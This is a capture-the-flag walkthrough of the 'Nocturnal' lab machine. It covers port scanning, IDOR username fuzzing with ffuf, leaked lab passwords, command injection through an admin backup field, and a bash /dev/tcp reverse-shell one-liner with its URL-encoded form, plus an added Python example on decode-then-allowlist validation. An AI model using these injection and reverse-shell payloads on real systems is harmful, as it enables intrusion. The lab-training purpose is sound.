Nocturnal

Enumeration
Nmap
nmap -p- --open -sCV --top-ports 500 10.10.11.64 -oG allPorts
#################################################################
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 20:26:88:70:08:51:ee:de:3a:a6:20:41:87:96:25:17 (RSA)
| 256 4f:80:05:33:a6:d4:22:64:e9:ed:14:e3:12:bc:96:f1 (ECDSA)
|_ 256 d9:88:1f:68:43:8e:d4:2a:52:fc:f0:66:d4:b9:ee:6b (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://nocturnal.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Web

Basic virtual hosting

We can create a new account and log in to reach a file upload form -->

I try to upload an image, and the response of the web service is -->

So... I will download a random PDF and try to upload it

We can see the uploaded file and the target web page here -->


Exploitation
So... it accepts a PDF. PDF injection?? Maybe... but it is an easy machine... We can see a possible IDOR:
http://nocturnal.htb/view.php?username={username}&file=someTest.pdf

We can fuzz common usernames with Intruder -->
I use two dictionaries, names.txt among them

We can do the same enumeration with ffuf too:
ffuf -w /usr/share/wordlists/seclists/Usernames/Names/names.txt -u 'http://nocturnal.htb/view.php?username=FUZZ&file=test.pdf' -H 'Cookie: PHPSESSID=olt58v8arrqqotc1ckci6q7qlq' -fs 2985
While testing some names and PDFs, I found this -->

So... maybe the main extension in use is .odt
Continuing with the user enumeration -->

The targets are the amanda and tobias users (but the information online is inside amanda's file) -->


amanda:arHkG7HAI68X8s1J
So... I can try to connect over SSH, or log in to the web -->

NICE! We are amanda, an admin; go to the admin panel -->

We can download a backup using the admin password and get a zip with all the files -->

Inside admin.php
we can see this:

The name that we input is HTML/URL-encoded in the source... and interpreted by PHP. Maybe we can execute commands with, for example, this -->
bash -c "whoami"
## URL Encode
bash%2b-c%2b"whoami"

NICE! We can read /etc/passwd and execute commands through this field, so let's try to get a reverse shell

Hmm... now the reverse shell -->
bash -c 'bash -i >& /dev/tcp/10.10.14.163/1234 0>&1'
## URL Encode
bash%2b-c%2b'bash%2b-i%2b>%2526%2b/dev/tcp/10.10.14.163/1234%2b0>%25261'
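Why the payloads above are written with %2b for spaces and %2526 for the ampersand: each form-style URL decode turns %2b into "+" and %2526 into %26, and a second decode turns "+" into a space and %26 into "&". An added example (mine, not from the writeup or the box) that decodes the two values shown here pass by pass, checks them against a hypothetical single-pass blocklist a developer might have written, and contrasts that with an allowlist applied after full decoding; the blocklist and allowlist regexes are assumptions, not Nocturnal's real code.

```python
import re
from urllib.parse import unquote_plus

# Constructed samples: the two encoded values shown in the writeup above.
ENCODED_SAMPLES = {
    "whoami": 'bash%2b-c%2b"whoami"',
    "revshell": "bash%2b-c%2b'bash%2b-i%2b>%2526%2b/dev/tcp/10.10.14.163/1234%2b0>%25261'",
}

# Hypothetical blocklist a developer might put in front of a shell call: it only
# looks for the obvious separators. It stands in for no real Nocturnal code.
NAIVE_BLOCKLIST = re.compile(r"[ ;&|$`]")

# Hypothetical allowlist for a backup/file name: letters, digits, dot, dash, underscore.
SAFE_NAME = re.compile(r"^[A-Za-z0-9._-]+$")


def decode_form_value(raw: str, passes: int) -> str:
    """Apply form-style URL decoding `passes` times ('+' -> space, %xx -> byte).

    Pass 1 turns %2b into '+' and %2526 into %26; pass 2 turns '+' into a
    space and %26 into '&'. That is exactly how the encoding above is built.
    """
    value = raw
    for _ in range(passes):
        value = unquote_plus(value)
    return value


def blocklist_flags(value: str) -> bool:
    """True when the hypothetical blocklist would reject the value as given."""
    return NAIVE_BLOCKLIST.search(value) is not None


def allowlist_accepts(raw: str) -> bool:
    """Defensive check: fully decode first, then accept only a plain file name."""
    return SAFE_NAME.fullmatch(decode_form_value(raw, passes=2)) is not None


if __name__ == "__main__":
    for label, raw in ENCODED_SAMPLES.items():
        once, twice = decode_form_value(raw, 1), decode_form_value(raw, 2)
        print(f"{label}: one pass  {once!r} -> blocked={blocklist_flags(once)}")
        print(f"{label}: two passes {twice!r} -> blocked={blocklist_flags(twice)}")
        print(f"{label}: allowlist accepts raw input: {allowlist_accepts(raw)}")
```

The point for a defender: a filter that runs before the last decode sees no space and no "&", so validation has to happen on the fully decoded value, and an allowlist of file-name characters is simpler than chasing metacharacters.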

NOTHING... so... can we make backups of other directories inside the service?
In register.php, from the backup downloaded earlier, we can see an internal db directory

After searching... I found a base64-encoding method -->


These are MD5 hashes -->

tobias:slowmotionapocalypse
We can try to connect via SSH -->
ssh tobias@10.10.11.64
User Flag



We can see an internal website running on port 8080 here; we can use SSH tunneling to view it -->
ssh -L 8080:127.0.0.1:8080 tobias@10.10.11.64

admin:slowmotionapocalypse


After a long enumeration, I found this CVE -->
Root Flag
Download and execute the script -->
